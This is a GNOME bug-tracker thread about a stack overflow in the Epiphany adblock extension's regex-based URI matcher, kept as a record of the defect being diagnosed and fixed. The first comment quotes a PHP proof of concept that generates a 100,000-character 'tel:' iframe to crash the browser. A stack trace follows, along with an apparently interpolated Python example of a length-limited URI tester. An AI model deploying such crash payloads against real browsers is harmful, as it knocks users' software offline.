Bug 595255 - Stack overflow in adblock's uri matcher
Status: RESOLVED OBSOLETE
Product: epiphany-extensions
Classification: Deprecated
Component: adblock
Version: 2.27.x
Hardware / OS: Other / Linux
Priority: Normal
Severity: critical
Target Milestone: ---
Assigned To: epiphany-extensions-maint
Depends on:
Blocks:
Reported: 2009-09-15 11:22 UTC by Priit Laes (IRC: plaes)
Modified: 2011-04-16 13:13 UTC
See Also:
GNOME target: ---
GNOME version: ---
Description Priit Laes (IRC: plaes) 2009-09-15 11:22:00 UTC
Following code causes stack overflow in adblock extension:

[snip]
# Apple Safari Iphone Crash using tel:
# Found by cloud : cloud[at]madpowah[dot]org
# http://blog.madpowah.org

# Tested on Iphone 3G, OS 3.0.1
# Launch Safari, enter the page and after a few seconds Safari will crash and black screen will appear

# Exploit:

<?php
set_time_limit(0);
$var = "";
for ($i=0; $i<100000; $i++){
       $var = $var . "A";
}
echo '<iframe src="tel:' . $var .'"></iframe>';
?>
[/snip]
Comment 1 Priit Laes (IRC: plaes) 2009-09-15 11:22:35 UTC
Stack trace:
  • #0 match
    at pcre_exec.c line 625
  • #1 match
    at pcre_exec.c line 4092
  • #2 match
    at pcre_exec.c line 716
  • #3 match
    at pcre_exec.c line 1186
  • #4 pcre_exec
    at pcre_exec.c line 4845
  • #5 IA__g_match_info_next
    at gregex.c line 514
  • #6 IA__g_regex_match_full
    at gregex.c line 1459
  • #7 IA__g_regex_match
    at gregex.c line 1370
  • #8 match_uri
    at ad-uri-tester.c line 102
  • #9 IA__g_hash_table_find
    at ghash.c line 1255
  • #10 ad_uri_tester_test_uri
    at ad-uri-tester.c line 165
  • #11 ephy_adblock_impl_should_load
    at ephy-adblock-extension.c line 189
  • #12 resource_request_starting_cb
    at ephy-embed.c line 213
  • #13 IA__g_closure_invoke
    at gclosure.c line 767
  • #14 signal_emit_unlocked_R
    at gsignal.c line 3247
  • #15 IA__g_signal_emit_valist
    at gsignal.c line 2980
  • #16 IA__g_signal_emit_by_name
    at gsignal.c line 3074
  • #17 WebKit::FrameLoaderClient::dispatchWillSendRequest
    at WebKit/gtk/WebCoreSupport/FrameLoaderClientGtk.cpp line 201
  • #18 WebCore::FrameLoader::dispatchWillSendRequest
    at WebCore/loader/FrameLoader.cpp line 5204
  • #19 WebCore::ResourceLoader::willSendRequest
    at WebCore/loader/ResourceLoader.cpp line 209

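The frames above show the request URI going from ad_uri_tester_test_uri straight into g_regex_match and from there into PCRE's recursive match, with nothing in between bounding the input. As an added example (not the extension's code and not the glib change the thread later mentions), here is a defender-side URI tester in Python that refuses over-long URIs before any pattern is evaluated and matches only precompiled, anchored patterns. The simplified wildcard pattern syntax, the sample block list, the MAX_URI_LENGTH value and the "tel:" test input are assumptions constructed for illustration.

```python
import re
from typing import List, Tuple

# Constructed sample block list in a simplified adblock-style syntax.
# Assumption: '*' matches any run of characters; everything else is literal.
# This is not the extension's real filter list.
SAMPLE_PATTERNS: List[str] = [
    "*/ads/*",
    "*doubleclick.net/*",
    "*banner*.gif",
]

# Assumed policy value: URIs longer than this are refused outright instead of
# being handed to a backtracking regex engine. 8 KiB comfortably covers real
# request targets while ruling out inputs like the 100000-byte PoC.
MAX_URI_LENGTH = 8192

# Constructed input modelled on the report's PoC: "tel:" followed by 100000 'A's.
POC_URI = "tel:" + "A" * 100000


def pattern_to_regex(pattern: str) -> re.Pattern:
    """Turn one wildcard pattern into an anchored regex.

    Every literal fragment is passed through re.escape, so a pattern cannot
    smuggle in regex metacharacters; only '*' becomes '.*'.
    """
    parts = [re.escape(p) for p in pattern.split("*")]
    return re.compile("^" + ".*".join(parts) + "$")


class UriTester:
    """Minimal stand-in for an adblock URI tester with an input-length gate."""

    def __init__(self, patterns: List[str], max_len: int = MAX_URI_LENGTH) -> None:
        # Compile once at construction; compiling per request would be wasteful
        # and, for user-supplied lists, a second place for bad input to bite.
        self.rules: List[Tuple[str, re.Pattern]] = [
            (p, pattern_to_regex(p)) for p in patterns
        ]
        self.max_len = max_len

    def test_uri(self, uri: str) -> Tuple[bool, str]:
        """Return (should_load, reason).

        The length check runs before any regex so that an over-long URI never
        reaches the matcher at all; the reason string names the rule that hit.
        """
        if len(uri) > self.max_len:
            return False, "uri too long"
        for original, rx in self.rules:
            if rx.match(uri):
                return False, f"blocked by {original}"
        return True, "ok"


if __name__ == "__main__":
    tester = UriTester(SAMPLE_PATTERNS)
    for candidate in (
        "http://example.org/index.html",
        "http://example.org/ads/spot.js",
        "http://cdn.example.org/banner_top.gif",
        POC_URI,
    ):
        load, why = tester.test_uri(candidate)
        print(f"{candidate[:40]:<40} load={load} ({why})")
```

The length gate is the point: it is the check that was missing between the page's URI and the regex engine in the trace above. It is not a complete defence on its own, since a pattern with nested or overlapping wildcards can still backtrack heavily on inputs well under the limit, so the escaping in pattern_to_regex and a review of the filter list matter as well.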
Comment 2 Pacho Ramos 2010-10-29 20:05:18 UTC
Any news on this?
Comment 3 Guillaume Ayoub 2011-04-16 12:15:45 UTC
Cannot reproduce with Epiphany 3.0 + Adblock. Seems to be fixed.

Original article with proof of concept:
http://blog.madpowah.org/archives/2009/09/index.html#e2009-09-13T22_22_31.txt
Comment 4 Priit Laes (IRC: plaes) 2011-04-16 13:13:55 UTC
(In reply to comment #3)
> Cannot reproduce with Epiphany 3.0 + Adblock. Seems to be fixed.
> 
> Original article with proof of concept:
> http://blog.madpowah.org/archives/2009/09/index.html#e2009-09-13T22_22_31.txt

Thanks, seems to be fixed meanwhile within glib.